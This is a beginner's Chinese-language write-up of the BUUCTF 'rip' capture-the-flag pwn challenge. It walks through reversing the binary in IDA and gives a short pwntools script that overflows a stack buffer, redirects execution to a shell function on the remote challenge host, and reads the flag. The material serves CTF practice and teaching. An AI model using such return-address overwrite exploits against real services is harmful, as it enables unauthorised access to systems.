網址
BUUCTF在線評測
https://buuoj.cn/challenges#rip打開,如圖所示
提示:先別啟動靶機,靶機可以最后在啟動,先分析下載的附件pwn1。
點擊下載,下載完成之后,該文件后綴類型改為exe(就是將pwn1重命名為pwn1.exe)然后拖到IDA64.exe中。(我不知道后綴類型到底要不要改,網上很多教程都沒講清楚,然后我看了一下ida能打開的文件基本上都是exe的,我就自己改了)
注意:做pwn題目基本都要用到IDA跟虛擬機(Linux),所以要提前裝好。
ida有很多版本,找一個能用的就行
ida及其相關資源網址(盡量找一些綠色網址下載)
IDA Pro入門指南:靜態反編譯神器的安裝與使用詳解-CSDN博客https://blog.csdn.net/qq_47403671/article/details/119939585逆向工具——IDA Pro的使用,從零基礎到精通,收藏這篇就夠了!_ida pro使用教程-CSDN博客https://blog.csdn.net/Python_0011/article/details/146866529IDA Pro 9.0 (macOS, Linux, Windows) - 強大的反匯編程序、反編譯器和多功能調試器 - sysin - 博客園https://www.cnblogs.com/sysin/p/18639073我安裝的是下面這個
[IDA] 加密與解密-ida的下載及詳細安裝過程(附有下載文件)_ida下載-CSDN博客https://blog.csdn.net/2301_77946674/article/details/141942756拖到ida64.exe中后有一些選項,默認就行了
打開后差不多是這樣(我這里已經做完了,不知道怎么恢復原狀)
如果不是這樣的,雙擊左側Functions window下的main,就變成這樣了,再按F5(有些好像是F12),總之一定要出現一下界面
再雙擊變量S,就是第六行的括號中的S,出現以下界面就可以了
注意到右邊兩個藍色S,觀察到S左邊由0變到F,一共是十六位,不管有什么用,先記下來。
雙擊左側fun,得到以下界面(注意看欄目)
如果是以下界面,請按F5(或其他)
拖動分界線,記錄fun函數內存地址0x401186
最后編寫exp(我不會,借鑒別人的)
# 導入 pwntools 模塊
from pwn import *# 和靶機進行連接
r = remote("node4.buuoj.cn",26817)#這里雙引號里面的替換成自己所啟動靶機的,端口26817一樣替換為自己靶機的# 定義fun函數的內存地址
fun_addr = 0x401187# 定義payload,一共需要十六進制f(16)個字節數據a,需要8個十進制字節數據(b),這些都是垃圾數據
# 最后加上p64函數轉換的fun函數的地址
payload = (b"a" * 0xf) + (b"b" * 8) + p64(fun_addr)# 發送payload
r.sendline(payload)# 獲取靶機交互式終端
r.interactive()
最后使用python運行,建議在虛擬機上操作。Windows上應該也可以
python 1.py #這里1.py替換成自己編寫的python文件我實在Ubuntu虛擬機上操作的,如圖所示
輸入ls(Linux?ls(英文全拼: list directory contents)命令用于顯示指定工作目錄下之內容(列出目前工作目錄所含的文件及子目錄)。)
觀察到特殊文件(或文件夾)flag,再次輸入cat flag ,結果如圖所示
得出flag
只不過我的虛擬機好像有點問題,在虛擬機中復制,卻在主機上粘貼不了,害得我只能一個個敲出來。
注意
cat(英文全拼:concatenate)命令用于連接文件并打印到標準輸出設備上,它的主要作用是用于查看和連接文件
其他,有需求請看以下網址內容
參考網址
BUUCTF-pwn-rip(第一個棧溢出) - Junglezt - 博客園https://www.cnblogs.com/Junglezt/p/17871927.htmlBUUCTF (PWN) RIP詳細分析_buuctf rip pwn 解法-CSDN博客https://blog.csdn.net/qy201706/article/details/105397766buuctf rip 詳細wp - refrain-again - 博客園https://www.cnblogs.com/refrain-again/p/15001283.htmlpwn學習(3)BUUCTF-rip - 技術棧https://jishuzhan.net/article/1704828218214715393
)
)
 視頻教程 - 微博評論IP地圖可視化分析實現)
詳解)
)
)